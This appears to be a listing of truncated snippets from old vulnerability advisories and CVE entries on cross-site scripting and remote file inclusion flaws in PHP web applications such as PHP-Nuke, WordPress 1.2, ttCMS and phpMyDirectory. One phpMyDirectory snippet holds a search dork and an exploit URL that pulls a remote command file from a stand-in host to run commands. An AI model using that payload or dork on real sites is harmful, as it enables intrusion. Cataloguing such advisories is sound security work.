CMS Faethon 1.3.2 - 'mainpath' Remote File Inclusion

\ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV33$2006 --------------------------------------------------------------------------- ECHOADV33$2006 CMS Faethon 1.3.2 mainpath Remote File Inclusion...

CVE-2006-2951

Multiple cross-site scripting XSS vulnerabilities in Net Portal Dynamic System NPDS 5.10 and earlier allow remote attackers to inject arbitrary web script and HTML via the 1 Titlesitename or 2 sitename parameter to a header.php, 3 nukeurl parameter to b meta/meta.php, 4 forum parameter to c...

CVE-2006-2951

CVE-2006-2951 concerns multiple cross-site scripting (XSS) vulnerabilities in Net Portal Dynamic System (NPDS)

phpmydir1044.txt

ENGLISH Title : phpMyDirectory = 10.4.4 Multiple Remote File Include Vulnerabilities Dork : "powered by phpmydirectory" Author : ajann greetz : Nukedx,TheHacker Exploit; http://target/path/template/default/footer.php?ROOTPATH=http://yourhost.com/cmd.txt?cmd=ls...

CVE-2006-1089

Cross-site scripting XSS vulnerability in header.php in PunBB 1.2.10 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly handled when the PHPSELF variable is used to handle a punpage tag...

PHP-Nuke 6.x7.x - header.php?Pagetitle Cross-Site Scripting

PHP-Nuke 6.x7.x - header.php?Pagetitle Cross-Site Scripting source: https://www.securityfocus.com/bid/16608/info PHPNuke is prone to a cross-site scripting vulnerability. This issue affects the 'header.php' script. PHPNuke 7.8 and prior versions are reportedly vulnerable...

PHP-Nuke 6.x/7.x - 'header.php?Pagetitle' Cross-Site Scripting

source: https://www.securityfocus.com/bid/16608/info PHPNuke is prone to a cross-site scripting vulnerability. This issue affects the 'header.php' script. PHPNuke 7.8 and prior versions are reportedly vulnerable. http://www.example.com/nuke78/?pagetitle=w00ttest...

CVE-2005-2776

Multiple cross-site scripting XSS vulnerabilities in Looking Glass 20040427 allow remote attackers to inject arbitrary web script or HTML via the 1 versionfullname, 2 versionhomepage, or 3 versionno parameter to footer.php, or the 4 versionfullname, 5 versionno, 6 versionauthor, 7 versionemail...

CVE-2005-2776

CVE-2005-2776: Looking Glass 20040427 is affected by multiple XSS vulnerabilities due to unsanitized input in header.php and footer.php. Attackers can inject arbitrary script via parameters: (1) version[fullname], (2) version[homepage], (3) version[no] to footer.php; and (4) version[fullname], (5...

CarLine Forum Russian Board 4.2 - 'menu_header.php' Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/14045/info Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks. Forum Russian Board 4.2 is reported to be affected...

CVE-2004-2038

Cross-site scripting XSS vulnerability in Land Down Under LDU before LDU 700 allows remote attackers to inject arbitrary web script or HTML via a BBcode img tag in 1 functions.php, 2 header.php or 3 auth.inc.php...

CVE-2004-2038

CVE-2004-2038 concerns a cross-site scripting (XSS) vulnerability in Land Down Under (LDU) prior to version 700. The issue allows remote attackers to inject arbitrary web script or HTML via a BBCode img tag in one of three PHP files: functions.php , header.php , or auth.inc.php . The provided doc...

CVE-2005-0720

CVE-2005-0720 documents a PHP remote file inclusion vulnerability in the admin/header.php component of mcNews 1.3 . An attacker can cause the application to execute arbitrary PHP code by altering the skinfile parameter to reference a URL on a remote server that contains the code. The description ...

CVE-2004-1559

Multiple cross-site scripting XSS vulnerabilities in Wordpress 1.2 allow remote attackers to inject arbitrary web script or HTML via the 1 redirectto, text, popupurl, or popuptitle parameters to wp-login.php, 2 redirecturl parameter to admin-header.php, 3 popuptitle, popupurl, content, or posttit...

CVE-2004-2038

Cross-site scripting XSS vulnerability in Land Down Under LDU before LDU 700 allows remote attackers to inject arbitrary web script or HTML via a BBcode img tag in 1 functions.php, 2 header.php or 3 auth.inc.php...

ttCMS 2.22.3 - header.php Remote File Inclusion

ttCMS 2.22.3 - header.php Remote File Inclusion source: https://www.securityfocus.com/bid/7625/info A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to...

ttCMS 2.2/2.3 - 'header.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/7625/info A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL...